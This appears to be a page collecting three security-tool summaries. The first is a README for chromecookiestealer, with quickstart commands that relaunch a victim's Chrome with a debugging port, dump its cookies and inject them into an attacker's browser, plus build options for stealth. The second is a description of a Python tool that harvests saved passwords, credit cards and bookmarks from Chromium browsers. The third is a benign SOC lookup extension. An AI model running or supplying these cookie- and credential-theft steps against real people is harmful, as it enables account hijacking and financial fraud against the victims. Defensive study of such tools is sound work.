Chromecookiestealer - Steal/Inject Chrome Cookies Over The DevTools Protocol

Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.

Heavily inspired by WhiteChocolateMacademiaNut.

Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.

For legal use only.

Features

• Dump Chrome's cookies
• Inject dumped Cookies into (another instance of) Chrome
• Clear Chrome's cookies
• Defaults settable at compile time

Quickstart

Steal a victim's cookies:

git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inject into the attacker's local browser:

# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json

Usage

Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	C   lear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

Building

go build should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar' for a touch more on-target stealth.

None of the above are set by default.

The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with

go get -u -v all
go mod tidy
go build

which could well have the side-effect of breaking everything else.

¯\_(ツ)_/¯

Browser-password-stealer - Get All The Saved Passwords, Credit Cards And Bookmarks From Chromium Based Browsers Supports Chromium 80 And Above!

This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers supports chromium 80 and above!

Modules Required

To install all the required modules use the following code:
pip install -r requirements.txt

Supported browsers

Chromium Based Browsers

✔ Amigo
✔ Torch
✔ Kometa
✔ Orbitum
✔ Cent-browser
✔ 7star
✔ Sputnik
✔ Vivaldi
✔ Google-chrome-sxs
✔ Google-chrome
✔ Epic-privacy-browser
✔ Microsoft-edge
✔ Uran
✔ Yandex
✔ Brave
✔ Iridium

Install Required Python Packages

pip install -r requirements.txt

How to Use

Just run this chromium_based_browsers.py the code will create a folder based on the browser name and stores the saved passwords, credit cards and bookmarks in that folder.

SOC-Multitool - A Powerful And User-Friendly Browser Extension That Streamlines Investigations For Security Professionals

Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more efficient. Now available on the Chrome Web Store and compatible with all Chromium-based browsers such as Microsoft Edge, Chrome, Brave, and Opera.
Now available on Chrome Web Store!

Streamline your investigations

SOC Multi-tool eliminates the need for constant copying and pasting during investigations. Simply highlight the text you want to investigate, right-click, and navigate to the type of data highlighted. The extension will then open new tabs with the results of your investigation.

Modern and feature-rich

The SOC Multi-tool is a modernized multi-tool built from the ground up, with a range of features and capabilities. Some of the key features include:

• IP Reputation Lookup using VirusTotal & AbuseIPDB
• IP Info Lookup using Tor relay checker & WHOIS
• Hash Reputation Lookup using VirusTotal
• Domain Reputation Lookup using VirusTotal & AbuseIPDB
• Domain Info Lookup using Alienvault
• Living off the land binaries Lookup using the LOLBas project
• Decoding of Base64 & HEX using CyberChef
• File Extension & Filename Lookup using fileinfo.com & File.net
• MAC Address manufacturer Lookup using maclookup.com
• Parsing of UserAgent using user-agents.net
• Microsoft Error code Lookup using Microsoft's DB
• Event ID Lookup (Windows, Sharepoint, SQL Server, Exchange, and Sysmon) using ultimatewindowssecurity.com
• Blockchain Address Lookup using blockchain.com
• CVE Info using cve.mitre.org

Easy to install

You can easily install the extension by downloading the release from the Chrome Web Store!
If you wish to make edits you can download from the releases page, extract the folder and make your changes.
To load your edited extension turn on developer mode in your browser's extensions settings, click "Load unpacked" and select the extracted folder!


SOC Multi-tool is a community-driven project and the developer encourages users to contribute and share better resources.